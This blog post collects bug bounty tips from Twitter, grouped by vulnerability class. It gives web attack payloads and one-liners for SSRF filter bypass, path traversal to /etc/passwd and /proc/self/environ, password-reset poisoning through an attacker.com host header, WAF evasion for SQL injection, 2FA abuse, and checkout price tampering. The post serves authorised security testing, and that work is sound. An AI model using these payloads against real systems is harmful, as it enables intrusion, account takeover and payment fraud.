#Bugbountytips

Before you start reading this post, let me tell you all the tips are collected from twitter (few mine 😓) where awesome community folks share their knowledge and experience. I tried to mention every single twitter handle from where I refer the tips, in case your name missed out please reach out to me. 😉







Authentication

# Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header.
POST /admin/deleteUser HTTP/1.1 -> 403

POST / HTTP/1.1 
X-Original-URL: /admin/deleteUser -> 200OK 

Bypass Success!

# Accessing the Admin Panel
https://target.com/admin/ - 302
https://target.com/admin..;/ - 200

IDOR

#Suppose you find endpoint 
GET /api_v1/messages?user_id=Your_user_id

Try
"GET /api v1/messages?user_id=Another_user_id"
"GET /api_v1/messages?user_id=Your_user_id&user_id=another_user_id"
"GET /api_v1/messages?user_id=another_user_id&user_id=Your_user_id"

CORS

# CORS Protection RegEx Bypass
If the target only allows main-domain and subdomains, try to write something at the beginning of the main-domain.

Origin: target.com --> Access-Control-Allow-Origin: target.com
Origin: eviltarget.com --> Not Vulnerable
Origin: sub.eviltarget.com --> Access-Control-Allow-Origin: sub.eviltarget.com

SQL Injection

# If you ever stuck with SQL + WAF (IP based)
1. Make use of IP Rotate Extension in burp and configure with AWS creds
2. Use Sqlmap with --proxy flag to route traffic via burp
3. Bypass+1 Exploit+1 


RCE

# Handy as hell tip for checking which functions you need to by pass on PHP 
<?php var_dump(explode(',',ini_get('disable_functions'))); ?>

Parse cvedetails.com for scores 6+ going back 3 years for vulns. Visit the reference pages for web vulns in this filter. Grab the paths for those vulns. Build your own RCE word list.


SSRF

# Bypass localhost IP blocked on SSRF
Create a subdomain and resolve it to 127.0.0.1 
You can also use post swagger subdomain, it's resolve to the localhost IP also: spoofed.burpcollaborator.net 

# One liner command(both manual & automatic)

Automatic One Liner SSRF:
assetfinder --subs-only target | httprobe | gau | gf ssrf | nuclei -t nuclei-templates/vulnerabilities/microstrategy-ssrf.yaml -o result.txt

Manual testing SSRF:
assetfinder --subs-only target | httprobe | gau | gf ssrf | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk 2>/dev/null

Then use burp collaborator to manipulate ssrf.

# Using IP Decimal to bypass '.' blacklisted character
Google IP: 216.58.212.110
Google IP Decimal: 3627734126
Example: target.com?redirect=http://3627734126 - Done

# Bypassing SSRF with CIDR
http://127.127.127.127
http://127.0.0.1

# Bypass using rare address
http://127.1
http://0/

# Bypass using tricks combination
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib : 3.3.3.3

# Bypass against a weak parser
http://127.1.1.1:80\@127.2.2.2:80/

# Bypass localhost with [::]
http://[::]80/
http://0000::1:80/

# Sentry Blind SSRF
1. cat aquatone/*/urls.txt | grep sentry 
2. Burpsuite 
3. Send it to Repeater 
4. Change the value of filename: to a postb.in url (or similar) 
5. Wait for a connection 

See a target running on Nginx?
GET @xx.collab.net/ or xxx.collaborator.net HTTP/1.1 
Host: target[.]com 

Always try for absolute urls. This has been affecting many apps. old is gold for ssrf.

A small Burpsuite trick which helped me to find Blind SSRF
1: Use Intruder to Bruteforce Headers 
2: Add Burp collaborator URL as value. 
3: Add prefix numerical payload (Pitchfork) 
4: Use Tarborator Extension to monitor hits


Security Misconfiguation

# Easy way to find exposed production code: 
1. Find a Gitlab hosted sub domain, usually named “code.domain” or “gitlab.domain” 
2. Even if login is required, try the “/snippets” endpoint. 
3. View internal source code snippets.

# Ways to bypass rate limit
1. Use the following request-header: X-Remote-IP: 127.0.0.1
2. Add 'Space' after the parameter value
3. Using null byte and CRLF '%00, %0d%0a, %09, %20, %0'
4. Changing user-agents and/or cookies


File Upload 

Extension list for File upload bugs ASP: 
".aspx", ".config", ".ashx", ".asmx", ".aspq", ".axd", ".cshtm", ".cshtml", ".rem", ".soap", ".vbhtm", ".vbhtml", ".asa", ".asp", ".cer", "shtml"

Local File Inclusion

# How to find local file read vulnerabilities based on cookies. 
Request 
GET /vulnerable.php HTTP/1.1 
Cookie:usid=../../../../../../../../../../../../../etc/passwd 

Response 
HTTP/1.1 200 OK 
... 
Server: Apache root:fi3sER6:0:1:System Operator:/:/bin/ksh//

# If you've got a cloud system and a LFI always have a peak at /etc/fstab you might be able to find more mounts like S3 buckets or efs shares with more juice.

# Escalate local file Inclusion
Try these files: "/proc/self/cmdline" "/proc/self/environ".  There might be keys or other sensitive information in there or it might give you ideas for other paths to investigate.

Account Takeover

#
1. Go to forget password add email > reset password
2. Intercept this request.
3. Add "X-forwarded-host: attacker.com"
4. Forward this request and check your email inbox.
5. If password reset link look like "http://www.attacker.com/reset-password/<reset_token>
6. For confirmation of password reset link valid or not, replace attacker.com URL with original URL click go.

#Using the password reset code more than once

Reset password base64 code/token:
cGFzc3dvcmR0b2tlbg=

Add another equal:
cGFzc3dvcmR0b2tlbg==

Add another equal:
cGFzc3dvcmR0b2tlbg===

Each time you add another equal, the code will work again.


Full Path Disclosure

# A useful tip for finding Full Path Disclosure vulnerabilities 
Drop an array ([] or even [1,2,3]) into a parameter. This can produce a full path disclosure error in response.


Price Manipulation Bugs

# Bypass the payment process and get the product without paying

1. It is preferable to choose Paypal or CoinPayments as a payment method.
2. Intercept all requests, you may find a parameter called 'Success' or 'Referrer' or 'Callback'
3. If the value inside the parameter  has a URL like this example.com/payment/MD5HASH for example
4. Copy it, and open it in a new window, you will find that your payment was successful.

# If the product price parameter can not be changed, change the quantity of products

items[1][quantity]=1  --> 234 $
items[1][quantity]=0.1 --> 23.4 $

Congratulations, you bought the order for 1% of the price.

1. Add two products to the basket [Let's consider a single product $40 ]
2. If the request is processed in this way : {"items":{"laptop":1,"mobile":1}}
3. Change the JSON body to {"items":{"laptop":4,"mobile":-2}}
4. The cost will become $20 for two items: 4 * $40 - 2 * $70 = $160 - $140 = $20

2FA

# No limit to send OTP by SMS
Impact would be DoS on user's phone

# No limit to refresh OTP
You can "infinitely" brute OTP constantly refreshing it with a low probability to guess

# Bruteforce OTP if there is no limit to verify OTP

# Check if 
No 2FA for disabling 2FA in account
No 2FA confirmation for password change
After 2FA activation other existing sessions still active/
You can reuse OTP from one action to other.
You can reuse your OTP to login as another user.

# Observed if, after password check a valid session has been created - Ignore 2FA

# OTP is associated with token. After refreshing a new OTP associated with a new token, but old pair is still valid.

# Sometimes OTP is leaked in header, response body or error

# Try to send OTP for different users in the same second.



Credits:
ADITYASHENDE17, jae_hak99, Random_Robbie, SalahHasoneh1, heald_ben, hsakarp_ilajna, Jhaddix, th3hokag3, Virdoex_hunter, Harshithvelneni, chiraggupta8769, trbughunters, EngMada9, scspcommunity, _n0nce, lutfumertceylan, cybersec_feeds, manas_hunter, AkaaZaan, Random_Robbie
, bpruston, AmitMDubey, hackerscrolls


(If you like the blog, share it with others 💓. 
DM or tag me in tweets if you want to include any other bugbountytips in this blog.)






Comments

Popular posts from this blog

API Testing Checklist

THE PLANETS: MERCURY Walkthrough - VulnHub

OSCP - Personal Notes